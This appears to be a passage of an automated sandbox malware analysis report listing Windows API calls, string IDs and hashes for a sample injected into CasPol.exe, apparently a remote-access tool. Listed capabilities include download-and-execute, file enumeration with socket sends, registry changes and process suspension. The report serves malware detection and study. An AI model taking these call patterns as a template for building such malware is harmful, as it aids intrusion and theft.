                                                                                                                                                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                              • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                                              • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 745075371-0
                                                                                                                                                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                              • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                                                                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                              • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                                                                              APIs
                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1157919129-0
                                                                                                                                                              • Opcode ID: 160c2ace42af5551170b97460db2d1c7e9fc336bd47d0bf9be650831b42887ab
                                                                                                                                                              • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                                                                              • Opcode Fuzzy Hash: 160c2ace42af5551170b97460db2d1c7e9fc336bd47d0bf9be650831b42887ab
                                                                                                                                                              • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                                                                              APIs
                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DownloadExecuteFileShell
                                                                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                                                                              • API String ID: 2825088817-4197237851
                                                                                                                                                              • Opcode ID: 5acb621709dcd52b4653e73e1f5b10cfc3ff47121ed233dfdb6cf10289f17ada
                                                                                                                                                              • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                                                                              • Opcode Fuzzy Hash: 5acb621709dcd52b4653e73e1f5b10cfc3ff47121ed233dfdb6cf10289f17ada
                                                                                                                                                              • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$FirstNextsend
                                                                                                                                                              • String ID: x@G$x@G
                                                                                                                                                              • API String ID: 4113138495-3390264752
                                                                                                                                                              • Opcode ID: 5da22b88f3612dc83bd68ee8e63c7a4ce902fecb027f1d0f6defda3fc66c9271
                                                                                                                                                              • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                                                                              • Opcode Fuzzy Hash: 5da22b88f3612dc83bd68ee8e63c7a4ce902fecb027f1d0f6defda3fc66c9271
                                                                                                                                                              • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                                                              APIs
                                                                                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                              • API String ID: 4127273184-3576401099
                                                                                                                                                              • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                                                              • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                                                                              • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                                                              • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                                                                              APIs
                                                                                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                              • API String ID: 4127273184-3576401099
                                                                                                                                                              • Opcode ID: 3cca19850bf31f4f0fb7f64d74422f26e2d0d512dadd11c93372ceda303b45d5
                                                                                                                                                              • Instruction ID: f2617a255fd7246e173cf48333a5ec3092ca3a632a8680fa2b2f8bd5747a896b
                                                                                                                                                              • Opcode Fuzzy Hash: 3cca19850bf31f4f0fb7f64d74422f26e2d0d512dadd11c93372ceda303b45d5
                                                                                                                                                              • Instruction Fuzzy Hash: 9EF0623278011422D529357A8E2FBEE1801D796B20F65402FF202A57D6FB8E46D142DE
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00450B61
                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4212172061-0
                                                                                                                                                              • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                              • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                                                                              • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                              • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                                                                              APIs
                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$FirstH_prologNext
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 301083792-0
                                                                                                                                                              • Opcode ID: 829a012926602753b85214bc65812e7bf9034f67f78a7fa4532cc8a33c3093e2
                                                                                                                                                              • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                                                                              • Opcode Fuzzy Hash: 829a012926602753b85214bc65812e7bf9034f67f78a7fa4532cc8a33c3093e2
                                                                                                                                                              • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 00448067
                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                              • GetTimeZoneInformation.KERNEL32 ref: 00448079
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 806657224-0
                                                                                                                                                              • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                                                              • Instruction ID: ab6739d36243922ba69d1bbe12a1b6ae93f84769bc63f42ae41568d8b76a7737
                                                                                                                                                              • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                                                              • Instruction Fuzzy Hash: 8731DA70904205DFEB149F68CC8186EBBF8FF05760B2442AFE054AB2A1DB349A42DB18
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2829624132-0
                                                                                                                                                              • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                                                              • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                                                                              • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                                                              • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                                                                              APIs
                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                              • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                              • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                                                                              • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                              • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                                                                              APIs
                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                              • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                              • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                              • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                              • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                              • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                              • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                                                                              • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                              • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                              • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                              • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                              • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                              • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                              APIs
                                                                                                                                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                                                                                                                              • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1999457699-0
                                                                                                                                                              • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                              • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                                                                                                                              • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                              • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                                                                                                                              APIs
                                                                                                                                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                                                                                                                              • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseHandleOpenResume
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3614150671-0
                                                                                                                                                              • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                              • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
